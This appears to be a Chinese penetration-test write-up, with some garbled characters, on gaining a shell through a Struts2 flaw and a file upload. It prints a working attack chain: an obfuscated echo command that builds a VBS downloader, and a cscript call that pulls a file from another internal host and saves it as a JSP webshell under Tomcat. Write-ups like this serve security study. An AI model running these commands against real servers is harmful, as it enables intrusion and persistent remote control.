前言
在項(xiàng)目中拿到一個比較有意思的shell柿汛。在此記錄一下。
struts漏洞
拿眼一打埠对,struts2框架络断。工具嘗試掃描,果然存在漏洞项玛。
image.png
但是確無法使用該工具的上傳功能貌笨。猜測應(yīng)該是權(quán)限不夠?qū)е碌摹?/p>
文件上傳
在登錄系統(tǒng)后發(fā)現(xiàn)一處文件上傳。
image.png
測試發(fā)現(xiàn)可進(jìn)行任意文件上傳襟沮。上傳jsp馬試試
image.png
emmm锥惋。好像沒有配置java環(huán)境,且不在同一臺服務(wù)器开伏。
嘗試上傳txt文本文件
image.png
訪問一下膀跌。
image.png
確定是jsp馬。
現(xiàn)在條件是:無法連接外網(wǎng)固灵、有文件上傳漏洞捅伤、命令執(zhí)行漏洞。
怎么拿shell呢怎虫?
思路:利用命令執(zhí)行powershell或vbs從192.168.40.13的服務(wù)器下載到192.168.40.21(不知為何powershell沒有成功)
vbs一句話下載payload
1.echo命令輸出創(chuàng)建downfile.vbs文件暑认。
注意轉(zhuǎn)義
echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >> downfile.vbs
2.downfile.vbs從192.168.40.13服務(wù)器下載文件到192.168.40.21服務(wù)器
cscript downfile.vbs http://192.168.40.13:9090/fileLibrary/5d5X9mSTZXjH9VlhXNN/x.txt D:\\tomcat8.5\\webapps\\x.jsp
image.png
下載的txt文件重命名為jsp一句話木馬
ok!4笊蟆蘸际!嘗試訪問
image.png
Nice!M椒觥粮彤!
image.png
